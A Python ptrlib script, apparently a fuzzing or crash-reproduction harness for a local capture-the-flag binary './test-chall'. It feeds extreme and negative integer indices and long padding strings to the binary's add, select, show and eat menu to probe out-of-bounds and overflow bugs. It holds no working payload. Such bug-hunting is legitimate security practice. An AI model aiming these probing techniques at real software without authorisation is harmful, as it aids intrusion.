from ptrlib import *

def add(index, name):
    sock.sendlineafter("choice: \n", "0")
    sock.sendlineafter("idx: \n", str(index))
    sock.sendlineafter("name: \n", name)

def select(index):
    sock.sendlineafter("choice: \n", "1")
    sock.sendlineafter("idx: \n", str(index))

def show(index):
    sock.sendlineafter("choice: \n", "2")

def eat(index):
    sock.sendlineafter("choice: \n", "3")

sock = Process("./test-chall")

eat(0)
show(-1)
show(18446744073709551615)
eat(18446744073709551615)
select(-18446744073709551615)
select(1)
eat(9223372036854775808)
add(0, 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA')
eat(9223372036854775808)
eat(18446744073709551615)
select(-18446744073709551615)
eat(-18446744073709551615)
eat(-18446744073709551615)
eat(18446744073709551615)
show(-9223372036854775808)
eat(1)
eat(18446744073709551615)
eat(-1)
show(-1)
select(-18446744073709551615)
eat(-18446744073709551615)
show(-18446744073709551615)
add(-1, 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA')
eat(-1)
eat(9223372036854775808)
add(-1, 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA')
eat(0)
select(18446744073709551615)
eat(0)
select(-18446744073709551615)
select(0)
eat(-1)
eat(-18446744073709551615)
eat(-18446744073709551615)
show(-9223372036854775808)
show(-1)
add(-9223372036854775808, 'AAAAAA')
eat(-18446744073709551615)
eat(-18446744073709551615)
show(-18446744073709551615)
add(-18446744073709551615, 'AAAAAAAAAAAAAAAAAAAAAAAAAA')
show(1)
eat(0)
eat(-18446744073709551615)
select(0)
select(18446744073709551615)
select(18446744073709551615)
eat(-9223372036854775808)
select(-1)
select(0)
select(-1)
eat(1)
add(0, 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA')
eat(18446744073709551615)
show(-1)
add(-1, 'AAAAAAAAAAAAAA')
input()
show(18446744073709551615)
print(sock.recvline())

sock.interactive()
